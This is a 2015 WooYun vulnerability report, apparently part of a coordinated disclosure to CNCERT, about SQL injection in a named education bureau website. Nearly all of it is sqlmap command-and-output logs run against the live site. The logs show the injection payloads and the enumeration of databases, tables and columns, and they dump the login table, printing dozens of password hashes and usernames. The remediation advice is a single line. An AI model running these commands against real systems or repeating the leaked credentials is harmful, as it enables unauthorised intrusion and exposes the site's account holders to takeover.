当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131266

漏洞标题:某教育局sql注射俩枚(导致数据泄露)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-08-05 17:08

修复时间:2015-09-21 15:06

公开时间:2015-09-21 15:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-05: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

Rt

详细说明:

SQL注射

漏洞证明:

注入点:http://www.dgjy.com.cn/news_list.asp?LM=49
http://www.dgjy.com.cn/Tea_and_res.asp?Flag=94
================================================================================================
[root@Hacker~]# Sqlmap -u http://www.dgjy.com.cn/news_list.asp?LM=49
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 15:32:26
[15:32:27] [INFO] testing connection to the target url
[15:32:31] [INFO] testing if the url is stable, wait a few seconds
[15:32:33] [INFO] url is stable
[15:32:33] [INFO] testing if GET parameter 'LM' is dynamic
[15:32:34] [INFO] confirming that GET parameter 'LM' is dynamic
[15:32:34] [INFO] GET parameter 'LM' is dynamic
[15:32:36] [WARNING] reflective value(s) found and filtering out
[15:32:36] [WARNING] heuristic test shows that GET parameter 'LM' might not be i
njectable
[15:32:36] [INFO] testing for SQL injection on GET parameter 'LM'
[15:32:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:32:40] [INFO] GET parameter 'LM' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[15:32:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[15:32:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:32:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[15:32:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[15:32:43] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:32:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:32:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:33:38] [INFO] GET parameter 'LM' is 'Microsoft SQL Server/Sybase stacked que
ries' injectable
[15:33:38] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:33:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:33:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:33:40] [INFO] testing 'Oracle AND time-based blind'
[15:33:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:33:40] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other potential injection technique found
[15:33:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:33:48] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[15:33:50] [INFO] target url appears to have 4 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[15:34:12] [WARNING] if UNION based SQL injection is not detected, please consid
er forcing the back-end DBMS (e.g. --dbms=mysql)
GET parameter 'LM' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] y
sqlmap identified the following injection points with a total of 60 HTTP(s) requ
ests:
---
Place: GET
Parameter: LM
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: LM=49 AND 5751=5751
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: LM=49; WAITFOR DELAY '0:0:5';--
---
[15:34:14] [INFO] testing MySQL
[15:34:14] [WARNING] the back-end DBMS is not MySQL
[15:34:14] [INFO] testing Oracle
[15:34:15] [WARNING] the back-end DBMS is not Oracle
[15:34:15] [INFO] testing PostgreSQL
[15:34:15] [WARNING] the back-end DBMS is not PostgreSQL
[15:34:15] [INFO] testing Microsoft SQL Server
[15:34:16] [INFO] confirming Microsoft SQL Server
[15:34:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[15:34:17] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[15:34:17] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\
??\salmap\Bin\output\www.dgjy.com.cn'
[*] shutting down at 15:34:17
============================================================================================
[root@Hacker~]# Sqlmap -u http://www.dgjy.com.cn/news_list.asp?LM=49 --current-d
b
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 15:35:39
[15:35:40] [INFO] resuming back-end DBMS 'microsoft sql server'
[15:35:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: LM
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: LM=49 AND 5751=5751
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: LM=49; WAITFOR DELAY '0:0:5';--
---
[15:35:40] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[15:35:40] [INFO] fetching current database
[15:35:40] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[15:35:40] [INFO] retrieved:
[15:35:41] [WARNING] reflective value(s) found and filtering out
Educate
current database: 'Educate'
[15:36:09] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[15:36:09] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\
??\salmap\Bin\output\www.dgjy.com.cn'
[*] shutting down at 15:36:09
============================================================================================
[root@Hacker~]# Sqlmap -u http://www.dgjy.com.cn/news_list.asp?LM=49 --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 15:37:38
[15:37:38] [INFO] resuming back-end DBMS 'microsoft sql server'
[15:37:38] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: LM
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: LM=49 AND 5751=5751
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: LM=49; WAITFOR DELAY '0:0:5';--
---
[15:37:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[15:37:39] [INFO] fetching database names
[15:37:39] [INFO] fetching number of databases
[15:37:39] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[15:37:39] [INFO] retrieved:
[15:37:40] [WARNING] reflective value(s) found and filtering out
7
[15:37:42] [INFO] retrieved: Educate
[15:38:21] [INFO] retrieved: master
[15:38:52] [INFO] retrieved: model
[15:39:11] [INFO] retrieved: msdb
[15:39:25] [INFO] retrieved: Northwind
[15:40:11] [INFO] retrieved: pubs
[15:40:26] [INFO] retrieved: tempdb
available databases [7]:
[*] Educate
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[15:41:01] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[15:41:01] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\
??\salmap\Bin\output\www.dgjy.com.cn'
[*] shutting down at 15:41:01
============================================================================================
[root@Hacker~]# Sqlmap -u http://www.dgjy.com.cn/news_list.asp?LM=49 --tables -D
"Educate"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 15:45:03
[15:45:03] [INFO] resuming back-end DBMS 'microsoft sql server'
[15:45:03] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: LM
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: LM=49 AND 5751=5751
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: LM=49; WAITFOR DELAY '0:0:5';--
---
[15:45:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[15:45:04] [INFO] fetching tables for database: Educate
[15:45:04] [INFO] fetching number of tables for database 'Educate'
[15:45:04] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[15:45:04] [INFO] retrieved:
[15:45:05] [WARNING] reflective value(s) found and filtering out
30
[15:45:08] [INFO] retrieved: dbo.comd_list
[15:45:57] [INFO] retrieved: dbo.D99_CMD
[15:46:31] [INFO] retrieved: dbo.D99_REG
[15:46:57] [INFO] retrieved: dbo.D99_Tmp
[15:47:15] [INFO] retrieved: dbo.DownLoad
[15:47:46] [INFO] retrieved: dbo.dtest
[15:48:07] [INFO] retrieved: dbo.dtproperties
[15:49:00] [INFO] retrieved: dbo.hack
[15:49:17] [INFO] retrieved: dbo.IP
[15:49:29] [INFO] retrieved: dbo.IpNews
[15:49:52] [INFO] retrieved: dbo.IpSum
[15:50:15] [INFO] retrieved: dbo.jiaozhu
[15:50:47] [INFO] retrieved: dbo.Link
[15:51:05] [INFO] retrieved: dbo.LM
[15:51:18] [INFO] retrieved: dbo.News
[15:51:38] [INFO] retrieved: dbo.num
[15:51:53] [INFO] retrieved: dbo.pangolin_test_table
[15:53:08] [INFO] retrieved: dbo.r3dm0v3_sql
[15:54:00] [INFO] retrieved: dbo.sqlmapoutput
[15:54:47] [INFO] retrieved: dbo.sysconstraints
[15:55:36] [INFO] retrieved: dbo.syssegments
[15:56:15] [INFO] retrieved: dbo.t_jiaozhu
[15:56:55] [INFO] retrieved: dbo.tb_login
[15:57:28] [INFO] retrieved: dbo.Tb_News_Power
[15:58:30] [INFO] retrieved: dbo.Tb_News_User
[15:58:54] [INFO] retrieved: dbo.tb_school_List
[15:59:57] [INFO] retrieved: dbo.tb_vote_Info
[16:00:34] [INFO] retrieved: dbo.tb_vote_master
[16:01:04] [INFO] retrieved: dbo.URL
[16:01:20] [INFO] retrieved: dbo.xiaolu
Database: Educate
[30 tables]
+-------------------------+
| dbo.D99_CMD |
| dbo.D99_REG |
| dbo.D99_Tmp |
| dbo.DownLoad |
| dbo.IP |
| dbo.IpNews |
| dbo.IpSum |
| dbo.LM |
| dbo.Link |
| dbo.News |
| dbo.Tb_News_Power |
| dbo.Tb_News_User |
| dbo.URL |
| dbo.comd_list |
| dbo.dtest |
| dbo.dtproperties |
| dbo.hack |
| dbo.jiaozhu |
| dbo.num |
| dbo.pangolin_test_table |
| dbo.r3dm0v3_sql |
| dbo.sqlmapoutput |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.t_jiaozhu |
| dbo.tb_login |
| dbo.tb_school_List |
| dbo.tb_vote_Info |
| dbo.tb_vote_master |
| dbo.xiaolu |
+-------------------------+
[16:01:50] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[16:01:50] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\
??\salmap\Bin\output\www.dgjy.com.cn'
[*] shutting down at 16:01:50
============================================================================================
[root@Hacker~]# Sqlmap -u http://www.dgjy.com.cn/news_list.asp?LM=49 --columns -
T "dbo.Tb_News_Power" -D "Educate"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:07:27
[16:07:27] [INFO] resuming back-end DBMS 'microsoft sql server'
[16:07:28] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: LM
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: LM=49 AND 5751=5751
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: LM=49; WAITFOR DELAY '0:0:5';--
---
[16:07:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[16:07:28] [INFO] fetching columns for table 'Tb_News_Power' in database 'Educat
e'
[16:07:28] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[16:07:28] [INFO] retrieved:
[16:07:29] [WARNING] reflective value(s) found and filtering out
2
[16:07:31] [INFO] retrieved: id
[16:07:43] [INFO] retrieved: numeric
[16:08:38] [INFO] retrieved: Power
[16:09:30] [INFO] retrieved: varchar
Database: Educate
Table: dbo.Tb_News_Power
[2 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| id | numeric |
| Power | varchar |
+--------+---------+
[16:10:43] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[16:10:43] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\
??\salmap\Bin\output\www.dgjy.com.cn'
===========================================================================================
[*] shutting down at 16:10:43
[root@Hacker~]# Sqlmap -u http://www.dgjy.com.cn/news_list.asp?LM=49 --columns -
T "dbo.tb_login" -D "Educate"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:12:05
[16:12:05] [INFO] resuming back-end DBMS 'microsoft sql server'
[16:12:05] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: LM
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: LM=49 AND 5751=5751
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: LM=49; WAITFOR DELAY '0:0:5';--
---
[16:12:06] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[16:12:06] [INFO] fetching columns for table 'tb_login' in database 'Educate'
[16:12:06] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[16:12:06] [INFO] retrieved:
[16:12:07] [WARNING] reflective value(s) found and filtering out
4
[16:12:14] [INFO] retrieved: id
[16:12:43] [INFO] retrieved: numeric
[16:13:48] [INFO] retrieved: Password
[16:14:52] [INFO] retrieved: varchar
[16:15:31] [INFO] retrieved: power
[16:15:54] [INFO] retrieved: varchar
[16:16:18] [INFO] retrieved: userName
[16:17:20] [INFO] retrieved: varchar
Database: Educate
Table: dbo.tb_login
[4 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| id | numeric |
| Password | varchar |
| power | varchar |
| userName | varchar |
+----------+---------+
[16:17:44] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[16:17:44] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\
??\salmap\Bin\output\www.dgjy.com.cn'
[*] shutting down at 16:17:44
============================================================================================
[root@Hacker~]# Sqlmap -u http://www.dgjy.com.cn/news_list.asp?LM=49 --dump -C "
password" -T "dbo.tb_login" -D "Educate"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:19:35
[16:19:35] [INFO] resuming back-end DBMS 'microsoft sql server'
[16:19:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: LM
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: LM=49 AND 5751=5751
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: LM=49; WAITFOR DELAY '0:0:5';--
---
[16:19:36] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[16:19:36] [INFO] fetching entries of column(s) 'password' for table 'tb_login'
in database 'Educate'
[16:19:36] [INFO] fetching number of column(s) 'password' entries for table 'tb_
login' in database 'Educate'
[16:19:36] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[16:19:36] [INFO] retrieved:
[16:19:36] [WARNING] reflective value(s) found and filtering out
67
[16:19:40] [INFO] fetching number of distinct values for column 'password'
[16:19:40] [INFO] retrieved: 47
[16:19:44] [WARNING] no proper pivot column provided (with unique values). It wo
n't be possible to retrieve all rows
[16:19:44] [INFO] retrieved: 0647c2ed25cc94e8
[16:20:37] [INFO] retrieved: 1511b4f6020ec61d
[16:21:32] [INFO] retrieved: 16bddee004aea501
[16:22:27] [INFO] retrieved: 2257717dd98d6838
[16:23:28] [INFO] retrieved: 26e33db3ae3e55b6
[16:24:18] [INFO] retrieved: 305af4b6366e443f
[16:26:03] [INFO] retrieved: 323b453885f5181f
[16:28:44] [INFO] retrieved: 39c68f5145dd2fcb
[16:30:50] [INFO] retrieved: 43a32d7c8a85ca1b
[16:33:18] [INFO] retrieved: 44f85485dca21fe6
[16:35:13] [INFO] retrieved: 47ed3c951ef1e0c5
[16:36:26] [INFO] retrieved: 489d943d2b31fb46
[16:37:37] [INFO] retrieved: 498d4b43a3f082a0
[16:40:23] [INFO] retrieved: 49ba59abbe56e057
[16:42:32] [INFO] retrieved: 4a82f4b1a36719d7
[16:45:17] [INFO] retrieved: 4d494e1fbd36bf8a
[16:47:28] [INFO] retrieved: 4e19ee602af8bc53
[16:48:26] [INFO] retrieved: 5f52f76ccc6c1271
[16:49:18] [INFO] retrieved: 63b27ec106195c96
[16:50:12] [INFO] retrieved: 6d6f2b08e9ae5d58
[16:51:10] [INFO] retrieved: 6e2b71d582547be2
[16:52:05] [INFO] retrieved: 73b829727c1ff47b
[16:52:59] [INFO] retrieved: 73f5a86f644f2d94
[16:53:53] [INFO] retrieved: 7711658367484679
[16:54:51] [INFO] retrieved: 77804d2ba1922c33
[16:55:53] [INFO] retrieved: 79755511abbb0503
[16:57:05] [INFO] retrieved: 8856deacb2d761e7
[16:58:10] [INFO] retrieved: 8cd724e9d38985c6
[16:59:02] [INFO] retrieved: 99ce0f130eaf7d25
[16:59:56] [INFO] retrieved: a40b29ba5a39b328
[17:00:44] [INFO] retrieved: a789a4bb6e71e0a3
[17:01:38] [INFO] retrieved: b86cd7df60206fa4
[17:02:42] [INFO] retrieved: bc33e3083b6e8fd1
[17:03:40] [INFO] retrieved: be51563abd6ceb84
[17:04:31] [INFO] retrieved: c831b04de153469d
[17:05:24] [INFO] retrieved: cccdc2fe33cfd8b4
[17:06:18] [INFO] retrieved: d1a82ae6d40d2b0f
[17:07:22] [INFO] retrieved: d6db6d953203cc62
[17:08:13] [INFO] retrieved: dd41057a14d05931
[17:09:18] [INFO] retrieved: de1ee221
[17:10:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[17:10:51] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
d34a99f8
[17:11:36] [INFO] retrieved: e6ec515485bc1dc8
[17:12:41] [INFO] retrieved: f17c5cb39e8d8db2
[17:13:34] [INFO] retrieved: f53b3d3c43ce7d61
[17:14:23] [INFO] retrieved: f82d132f9bb018ca
[17:15:16] [INFO] retrieved: fa529d7273da0db6
[17:16:09] [INFO] retrieved: fc325615d840567a
[17:17:03] [INFO] retrieved: fe30a42c208a5bd3
===========================================================================================
[root@Hacker~]# Sqlmap -u http://www.dgjy.com.cn/news_list.asp?LM=49 --dump -C "
userName" -T "dbo.tb_login" -D "Educate"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 17:22:31
[17:22:32] [INFO] resuming back-end DBMS 'microsoft sql server'
[17:22:32] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: LM
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: LM=49 AND 5751=5751
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: LM=49; WAITFOR DELAY '0:0:5';--
---
[17:22:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[17:22:34] [INFO] fetching entries of column(s) 'userName' for table 'tb_login'
in database 'Educate'
[17:22:34] [INFO] fetching number of column(s) 'userName' entries for table 'tb_
login' in database 'Educate'
[17:22:34] [INFO] resumed: 67
[17:22:34] [INFO] fetching number of distinct values for column 'userName'
[17:22:34] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[17:22:34] [INFO] retrieved:
[17:22:35] [WARNING] reflective value(s) found and filtering out
67
[17:22:42] [INFO] using column 'userName' as a pivot for retrieving row data
[17:22:42] [INFO] retrieved: jiaoyugaikuang
[17:23:39] [INFO] retrieved: jxbgs
[17:23:57] [INFO] retrieved: jxfxb
[17:24:17] [INFO] retrieved: jxhjh
[17:24:36] [INFO] retrieved: jxjks
[17:24:54] [INFO] retrieved: jxjx
[17:25:09] [INFO] retrieved: jxkcs
[17:25:27] [INFO] retrieved: jxlgs
[17:25:45] [INFO] retrieved: jxljf
[17:26:06] [INFO] retrieved: jxlxh
[17:26:25] [INFO] retrieved: jxpxb
[17:26:47] [INFO] retrieved: jxswz
[17:27:07] [INFO] retrieved: jxwdp
[17:27:26] [INFO] retrieved: jxxxkx
[17:27:53] [INFO] retrieved: jxxxms
[17:28:26] [INFO] retrieved: jxxxs

修复方案:

加强字符过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-07 15:04

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给相应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无